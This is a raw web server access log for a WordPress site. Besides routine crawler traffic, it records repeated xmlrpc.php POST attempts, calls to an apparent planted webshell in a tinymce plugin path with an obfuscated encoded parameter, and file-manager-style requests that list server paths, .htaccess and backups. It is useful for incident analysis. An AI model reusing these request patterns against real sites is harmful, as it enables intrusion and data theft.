172.71.170.147 - - [06/Dec/2025:04:40:55 +0100] "GET /?f=4062585860 HTTP/1.0" 200 229929 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.170.147 - - [06/Dec/2025:04:40:56 +0100] "GET /?f=558486658 HTTP/1.0" 200 243748 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.159.122.43 - - [06/Dec/2025:04:41:01 +0100] "POST /xmlrpc.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36"
172.68.234.32 - - [06/Dec/2025:04:41:02 +0100] "POST /xmlrpc.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36"
162.159.122.43 - - [06/Dec/2025:04:41:03 +0100] "POST /xmlrpc.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36"
162.159.122.43 - - [06/Dec/2025:04:41:03 +0100] "POST /xmlrpc.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36"
172.71.246.47 - - [06/Dec/2025:04:39:06 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353934362p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323334362q6531663735383466366565326333656164306232343335333433663738303037222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.166.40 - - [06/Dec/2025:04:41:08 +0100] "GET /?f=2138849693 HTTP/1.0" 200 223282 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.166.40 - - [06/Dec/2025:04:41:09 +0100] "GET /?f=690206632 HTTP/1.0" 200 214765 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.32 - - [06/Dec/2025:04:41:11 +0100] "GET /?f=1910064803 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.65.159 - - [06/Dec/2025:04:41:13 +0100] "GET /?f=2810060930 HTTP/1.0" 200 232435 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.65.159 - - [06/Dec/2025:04:41:22 +0100] "GET /?f=3442653417 HTTP/1.0" 200 200577 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.254.199 - - [06/Dec/2025:04:41:22 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2F.myimunify_id&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com HTTP/1.0" 200 16112 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.195.206 - - [06/Dec/2025:04:39:27 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353936372p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323336372q6331356331323831373339666663383339616636653438623835313261633361222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.232.100 - - [06/Dec/2025:04:41:28 +0100] "GET /product/iphone-12-pro-max/ HTTP/1.0" 200 63847 "-" "Mozilla/5.0 (compatible; IbouBot/1.0; [email protected]; +https://ibou.io/iboubot.html)"
172.69.71.183 - - [06/Dec/2025:04:41:32 +0100] "GET /?f=3163863381 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.31 - - [06/Dec/2025:04:41:33 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com HTTP/1.0" 200 18104 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.65.159 - - [06/Dec/2025:04:41:34 +0100] "GET /?f=464010396 HTTP/1.0" 200 199246 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.65.159 - - [06/Dec/2025:04:41:45 +0100] "GET /?f=3840421461 HTTP/1.0" 200 217404 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.246.196 - - [06/Dec/2025:04:39:48 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939353938382p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323338382q6431366266313332303431346434623330666261386530396433356231396166222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.65.159 - - [06/Dec/2025:04:41:57 +0100] "GET /?f=2752765138 HTTP/1.0" 200 206314 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.126.202 - - [06/Dec/2025:04:41:59 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fwordpress-backups HTTP/1.0" 200 16482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.22.1.32 - - [06/Dec/2025:04:42:01 +0100] "GET /?f=1697641510 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.119.59 - - [06/Dec/2025:04:40:09 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939363030392p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323430392q3836366633633838626436343465653532303439663738633662643736613864222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
198.41.227.173 - - [06/Dec/2025:04:42:09 +0100] "GET /?f=2583247907 HTTP/1.0" 200 235630 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.120.51 - - [06/Dec/2025:04:42:10 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2F.imunify_patch_id&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com HTTP/1.0" 200 16120 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.158.175.147 - - [06/Dec/2025:04:42:20 +0100] "GET /?f=3482820844 HTTP/1.0" 200 207811 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.32 - - [06/Dec/2025:04:42:21 +0100] "GET /?o=76352226071730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:04:42:24 +0100] "GET /?o=42447710011730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.195.206 - - [06/Dec/2025:04:40:30 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939363033302p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323433302q6164623565323539393436313237393931663063616163623162656135313538222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
162.159.106.43 - - [06/Dec/2025:04:42:32 +0100] "GET /?f=47943297 HTTP/1.0" 200 210962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.30.99 - - [06/Dec/2025:04:42:40 +0100] "GET /?f=2139424166 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.159.106.43 - - [06/Dec/2025:04:42:43 +0100] "GET /?f=4241808740 HTTP/1.0" 200 202849 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.30 - - [06/Dec/2025:04:42:50 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-http-requests-response.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 21016 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.240.209 - - [06/Dec/2025:04:40:51 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939363035312p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323435312q3863363865396661613462613265336434396638366539386438396634313266222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.70.80.30 - - [06/Dec/2025:04:42:53 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-http-ixr-client.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 20268 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.159.106.43 - - [06/Dec/2025:04:42:54 +0100] "GET /?f=1719673254 HTTP/1.0" 200 212958 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.30 - - [06/Dec/2025:04:42:56 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-http-response.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 19228 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.71.183 - - [06/Dec/2025:04:42:57 +0100] "GET /?f=3750402540 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:42:59 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-http-proxy.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 22698 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:43:02 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-http-streams.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 35829 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:43:05 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass.wp-dependencies.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 16614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
198.41.227.173 - - [06/Dec/2025:04:43:06 +0100] "GET /?f=3732006785 HTTP/1.0" 200 228769 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.30 - - [06/Dec/2025:04:43:08 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-http-requests-hooks.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 18282 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:43:11 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-content%2Fupgrade-temp-backup HTTP/1.0" 200 16659 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.243.151 - - [06/Dec/2025:04:41:12 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939363037322p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323437322q3532356161393565316166616135626432353831376661653061356264393232222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.70.80.30 - - [06/Dec/2025:04:43:14 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-image-editor.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 34401 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:43:17 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-image-editor-imagick.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 56752 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.158.175.147 - - [06/Dec/2025:04:43:17 +0100] "GET /?f=4281473322 HTTP/1.0" 200 203576 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.30 - - [06/Dec/2025:04:43:20 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-http-curl.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 30981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:43:23 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-block-pattern-categories-registry.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 21818 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:43:26 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Ffunctions.wp-styles.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 25450 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.30.99 - - [06/Dec/2025:04:43:27 +0100] "GET /?f=3772244215 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:43:29 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-block-patterns-registry.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 27452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.159.106.43 - - [06/Dec/2025:04:43:29 +0100] "GET /?f=915208772 HTTP/1.0" 200 212816 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.30 - - [06/Dec/2025:04:43:32 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-block-parser.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 28486 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.144.16 - - [06/Dec/2025:04:41:33 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939363039332p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939323439332q3337663236376638356636383637336536356664616330376138313165333663222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.70.80.30 - - [06/Dec/2025:04:43:35 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fabilities-api HTTP/1.0" 200 23567 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:43:38 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Frest-api HTTP/1.0" 200 26133 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.159.106.43 - - [06/Dec/2025:04:43:40 +0100] "GET /?f=3758322043 HTTP/1.0" 200 215334 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.30 - - [06/Dec/2025:04:43:41 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fblock-patterns HTTP/1.0" 200 28655 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.70.197 - - [06/Dec/2025:04:43:41 +0100] "GET /?f=1067707206 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.158.202.108 - - [06/Dec/2025:04:43:42 +0100] "GET /?path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/burst-statistics/upgrade HTTP/1.0" 200 35842 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.70.80.30 - - [06/Dec/2025:04:43:44 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-fatal-error-handler.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 24893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.158.202.108 - - [06/Dec/2025:04:43:46 +0100] "GET /?path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/chaty/admin HTTP/1.0" 200 23463 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.70.80.30 - - [06/Dec/2025:04:43:47 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass.wp-scripts.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 16579 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:43:50 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-text-diff-renderer-table.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 36700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.158.202.108 - - [06/Dec/2025:04:43:50 +0100] "GET /?path=/var/www/vhosts/iphonesused.com/httpdocs/wp-content/plugins/chaty/css HTTP/1.0" 200 20215 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
162.159.106.43 - - [06/Dec/2025:04:43:52 +0100] "GET /?f=119937085 HTTP/1.0" 200 216165 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.30 - - [06/Dec/2025:04:43:53 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-block-bindings-source.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 19277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
